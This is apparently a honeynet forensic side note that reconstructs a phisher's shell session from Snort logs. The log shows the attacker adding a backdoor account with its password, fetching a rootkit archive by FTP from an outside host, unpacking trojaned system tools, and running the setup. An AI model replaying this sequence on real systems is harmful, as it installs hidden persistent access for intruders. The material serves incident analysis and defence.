Analysis of German attacker's sessions

This side note shows the commands issued by the phisher from the perspective of the attacker. Their actions were reconstructed with the help of the log files generated by Snort and other logged data. The first part of this side note shows a screenshot of the installation process of the rootkit, with a very "user-friendly" interface allowing easy setup. The second part shows the commands issued by the attacker once the rookit was installed, which were again reconstructed with the help of Snort log-files.

Screenshot of the rootkit installation:

[image:../../images/rootkit_screenshot.png size=full]

Commands issued by the attacker:

  /usr/sbin/adduser ro
  passwd ro
  0030934040877
  0030934040877
  Changing password for user ro
  passwd: all authentication tokens updated successfully
  ftp -v 204.92.xxx.xxx
  Connected to 204.92.xxx.xxx.
  220 Ftp server ready.
  choose
  Name (204.92.xxx.xxx:root): 331 User choose okay, need password.
  a
  530 Login incorrect.
  bye
  Remote system type is UNIX.
  Using binary mode to transfer files.
  221 Goodbye.
  ftp -v 204.92.xxx.xxx
  Connected to 204.92.xxx.xxx.
  220 Ftp server ready.
  example
  Name (204.92.xxx.xxx:root): 331 User example okay, need password.
  choose
  230-You are user #14 of 350 simultaneous users allowed.
  230-
  230 Restricted user logged in.
  hash
  pass
  deb
  bin
  Remote system type is UNIX.
  Using binary mode to transfer files.
  Hash mark printing on (1024 bytes/hash mark).
  Passive mode off.
  Debugging on (debug=1).
  ---> TYPE I
  200 Type okay.
  cd cgi-bin
  ---> CWD cgi-bin
  250 "/cgi-bin" is new cwd.
  cd rootkyt
  ---> CWD rootkyt
  ls
  250 "/cgi-bin/rootkyt" is new cwd.
  ---> TYPE A
  200 Type okay.
  ---> PORT 212,44,161,115,9,136
  200 PORT command successful.
  ---> LIST
  150 Opening ASCII mode data connection for /bin/ls.
  -rw-r--r-- 1 ftpuser web 21194156 Sep 6 06:41 list.txt.txt
  -rw-r--r-- 1 ftpuser web 723128 Jun 21 15:01 superwu.tgz
  226 Listing completed.
  cd ..
  ---> CWD ..
  250 "/cgi-bin" is new cwd.
  ls
  ---> PORT 212,44,161,115,9,137
  200 PORT command successful.
  ---> LIST
  150 Opening ASCII mode data connection for /bin/ls.
  -rw-r--r-- 1 ftpuser web 4107318 Feb 22 2004 SS.tgz
  -rw-r--r-- 1 ftpuser web 55271 Aug 6 08:02 Bank.zip
  -rw-r--r-- 1 ftpuser web 0 Sep 24 16:10 aw.tgz
  -rw-r--r-- 1 ftpuser web 1528 May 25 2004 email.tgz
  -rw-r--r-- 1 ftpuser web 0 Sep 26 11:08 limba1.tgz
  -rw-r--r-- 1 ftpuser web 52250 Aug 9 15:20 limbos.tgz
  -rw-r--r-- 1 ftpuser web 50177 May 23 2004 muie.tgz
  -rw-r--r-- 1 ftpuser web 0 Sep 26 09:01 new2.tgz
  drwxr-xr-x 2 ftpuser web 512 Sep 14 11:34 website
  -rw-r--r-- 1 ftpuser web 102240 Jun 4 16:46 website.tar.gz
  -rw-r--r-- 1 ftpuser web 102223 Jun 4 16:45 website.tgz
  -rwxr-xr-x 1 ftpuser web 3350063 Jul 9 17:39 php
  -rw-r--r-- 1 ftpuser web 0 Sep 30 15:07 pulamea.tgz
  drwxr-xr-x 2 ftpuser web 512 Sep 6 06:29 rootkyt
  -rw-r--r-- 1 ftpuser web 50200 May 23 2004 sa-va-dau-la-muie.tgz
  -rw-r--r-- 1 ftpuser web 1960 Aug 3 06:24 send.tgz
  -rw-r--r-- 1 ftpuser web 2086 Sep 22 15:04 sendspam.tgz
  -rw-r--r-- 1 ftpuser web 0 Oct 3 08:09 spam.tar.gz
  -rw-r--r-- 1 ftpuser web 52236 Aug 3 06:12 spam1.tgz
  -rw-r--r-- 1 ftpuser web 50176 Sep 22 14:29 spamul.tgz
  -rw-r--r-- 1 ftpuser web 2758 May 26 2004 trimite.zip
  226 Listing completed.
  cd ..
  ---> CWD ..
  ls
  250 "/" is new cwd.
  ---> PORT 212,44,161,115,9,138
  200 PORT command successful.
  ---> LIST
  150 Opening ASCII mode data connection for /bin/ls.
  drwxr-x--- 5 ftpuser web 512 Oct 25 10:59 cgi-bin
  drwxr-x--- 4 ftpuser web 1024 Nov 14 17:21 www
  226 Listing completed.
  cd www
  ---> CWD www
  ls
  250 "/www" is new cwd.
  ---> PORT 212,44,161,115,9,139
  200 PORT command successful.
  ---> LIST
  150 Opening ASCII mode data connection for /bin/ls.
  -rw-r--r-- 1 ftpuser web 13996 Apr 22 2004 asp.tgz
  -rw-r----- 1 ftpuser web 695 Jan 21 2003 index.htm
  -rw-r--r-- 1 ftpuser web 82211 Oct 20 2003 local.tgz
  -rw-r--r-- 1 ftpuser web 37910 Sep 16 2003 mass2.tar.gz
  drwxr-xr-x 2 ftpuser web 512 Aug 20 14:00 muie
  -rw-r--r-- 1 ftpuser web 12755 Jun 6 2003 pizda.tgz
  -rw-r--r-- 1 ftpuser web 130892 Jun 5 2003 screen.tgz
  -rw-r--r-- 1 ftpuser web 0 Nov 11 10:39 spam-asp.tgz
  -rw-r--r-- 1 ftpuser web 10332 Aug 11 2003 sslstop.tar.gz
  -rw-r--r-- 1 ftpuser web 31965 Oct 20 2003 strobe.tgz
  drwxr-xr-x 2 ftpuser web 512 Aug 20 14:00 superwu.tgz
  226 Listing completed.
  cd ..
  ---> CWD ..
  250 "/" is new cwd.
  cd cgi-bin
  ---> CWD cgi-bin
  250 "/cgi-bin" is new cwd.
  cd rootkyt
  ---> CWD rootkyt
  250 "/cgi-bin/rootkyt" is new cwd.
  get superwu.tgz
  local: superwu.tgz remote: superwu.tgz
  ---> TYPE I
  200 Type okay.
  ---> PORT 212,44,161,115,9,140
  200 PORT command successful.
  ---> RETR superwu.tgz
  150 Opening BINARY mode data connection for superwu.tgz (723128 bytes).
  ##################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
  226 Transfer completed.
  bye
  723128 bytes received in 96.7 secs (7.3 Kbytes/sec)
  ---> QUIT
  221 Goodbye.
  tar xzvf superwu.tgz
  .nr/
  .nr/createdir
  .nr/firewall
  .nr/status
  .nr/clean
  .nr/mailme
  .nr/patch
  .nr/remove
  .nr/replace
  .nr/startfile
  .nr/init
  .nr/sendmail/
  .nr/sendmail/sshd_config
  .nr/sendmail/ssh_host_key
  .nr/sendmail/ssh_random_seed
  .nr/sendmail/sendmail
  .nr/chattr
  .nr/dir
  .nr/du
  .nr/encrypt
  .nr/fix
  .nr/ifconfig
  .nr/killall
  .nr/libproc.so.2.0.6
  .nr/login
  .nr/ls
  .nr/lsof
  .nr/md5sum
  .nr/netstat
  .nr/ps
  .nr/pstree
  .nr/socklist/
  .nr/socklist/Xf/
  .nr/socklist/Xf/fix.c
  .nr/socklist/Xf/fix
  .nr/socklist/Xf/chattr
  .nr/socklist/Xf/socklistx.c
  .nr/socklist/Xf/socklistx
  .nr/socklist/Xf/move
  .nr/socklist/Xf/stringsx.c
  .nr/socklist/Xf/stringsx
  .nr/socklist/socklist
  .nr/socklist/utils/
  .nr/socklist/utils/.siz.c
  .nr/socklist/utils/siz
  .nr/top
  .nr/vdir
  .nr/lg
  .nr/.c
  .nr/.d
  .nr/.p
  .nr/write
  .nr/read
  .nr/cl
  .nr/curatare/
  .nr/curatare/ps
  .nr/curatare/pstree
  .nr/curatare/sshd
  .nr/curatare/clean
  .nr/curatare/chattr
  .nr/curatare/attrib
  setup
  ./setup